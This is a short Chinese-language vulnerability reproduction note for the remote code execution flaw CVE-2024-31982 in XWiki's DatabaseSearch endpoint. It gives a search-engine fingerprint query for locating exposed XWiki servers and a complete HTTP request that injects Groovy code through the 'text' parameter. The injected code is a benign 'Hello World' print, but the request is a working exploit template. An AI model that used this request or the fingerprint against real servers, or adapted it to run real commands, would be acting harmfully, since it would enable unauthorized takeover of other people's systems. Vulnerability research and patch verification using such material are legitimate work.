# XWiki DatabaseSearch存在远程命令执行漏洞（CVE-2024-31982）

# 一、漏洞简介
XWiki是一个由Java编写的基于LGPL协议发布的开源wiki和应用平台。它的开发平台特性允许创建协作式Web应用，同时也提供了构建于平台之上的打包应用（第二代wiki）。XWiki DatabaseSearch接口处存在RCE漏洞（CVE-2024-31982），恶意攻击者可能利用此漏洞执行恶意命令，获取服务器敏感信息，最终可能导致服务器失陷。

# 二、影响版本
XWiki

# 三、资产测绘
```plain
body="data-xwiki-reference"
```

![1718991317308-42e2df7f-35ed-465e-84b6-3bb246ce0832.png](./img/bKcs4dowKNy8ybF3/1718991317308-42e2df7f-35ed-465e-84b6-3bb246ce0832-659769.png)

# 四、漏洞复现
```java
GET /xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync+async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello+World!%22++%2B+%2850+%2B+49%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0
```

![1718991292434-48a4a954-7965-4a83-ad76-c889f58e7327.png](./img/bKcs4dowKNy8ybF3/1718991292434-48a4a954-7965-4a83-ad76-c889f58e7327-084598.png)



> 更新: 2024-06-23 23:42:48  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ft07tqn8syvqtesk>